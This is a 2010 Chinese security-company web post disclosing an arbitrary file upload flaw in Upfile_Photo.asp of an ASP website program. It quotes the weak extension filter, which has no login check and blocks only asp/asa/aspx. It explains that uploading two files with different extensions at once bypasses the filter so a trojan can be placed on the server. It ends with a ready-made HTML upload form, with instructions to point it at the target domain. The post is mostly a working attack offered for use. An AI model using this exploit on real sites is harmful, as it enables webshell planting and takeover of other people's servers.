网络安全 红科网安(北京)科技有限公司 联系我们 | 加入收藏
信息安全紧急求助:400-6662-110
    红科网安 / 技术研究 融汇优秀技术 创新攻防理念 打造安全专家! Honkwin (Beijing) Science and Technology Co.Ltd
  技术研究
 
 
      业界动态
      安全漏洞
      技术文章
 

    客服热线:
    010-62663110
    010-62717538
2010-07-27 14:40:09 作者: honkwin 来源: 浏览次数:0
 
上一篇 下一篇

发表:红科网安
发布日期:2010-07.26  
发布作者:anliou
官方地址:http://www.tywork.net/
漏洞描述:

Upload_Photo.asp 打开查看源文件之后发现提交到的地址是 Upfile_Photo.asp
打开Upfile_Photo.asp的源代码,发现程序没有对用户身份进行判断
我贴出发生漏洞的代码

for i=0 to ubound(arrUpFileType) ‘对文件的后缀进行判断,如果属于程序要求的后缀,那么就将 EnableUpload变量置为True   if fileEXT=trim(arrUpFileType(i)) then   EnableUpload=true   exit for   end if   next   if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then '判断文件的后缀是不是属于asp、asa、aspx这三种类型(重点问题也发生在这里,   EnableUpload=false '在这里没有对cer、php等等后缀进行过滤,也没有使用Trim对空格进行过滤)   end if   if EnableUpload=false then   msg="这种文件类型不允许上传! 只允许上传这几种文件类型:" & UpFileType   FoundErr=true '判断我们的EnableUpload这个变量是真或者假,真表示合法   end if    strJS="" & vbcrlf   if FoundErrtrue then    randomize   ranNum=int(900*rnd)+100 '在这里又对FoundErr变量进行判断,不为True那就可以上传了。   filename="big"&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&fileExt   smallfilename=year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&fileExt   ofile.SaveToFile Server.mappath(SavePath&filename) '保存文件   这不就是以前那个动易的上传漏洞吗?由于这个化境无组件上传可以上传多个文件,我们可以通过上传同时两个不同后缀的文件来绕过判断,从而将我们的木马直接提交到服务器上。

<form action="http://127.0.0.1/Upfile_Photo.asp" method="post" name="form1" enctype="multipart/form-data"> '其中127.0.0.1要改成你要提交的域名URL.
<input name="FileName" type="FILE" class="tx1" size="21" >
<input name="FileName1" type="FILE" class="tx1" size="21" >
<input type="submit" name="Submit" value="上传" style="border:1px double rgb(88,88,88);font:9pt">
<input name="PhotoUrlID" type="hidden" id="PhotoUrlID" value="1">
</form>

 

网络安全   公司简介  | 联系我们  | 加入我们 | 隐私声明 | 版权申明 | 免责条款 | 网站地图 | 合作伙伴 | 合作加盟 | 帮助 | 友情链接 |
Copyright @ 2007-2011 Honkwin. All Rights Reserved.      献身使命,让网络因我们而安全!
京ICP备:09027577号   单位编号:1101083313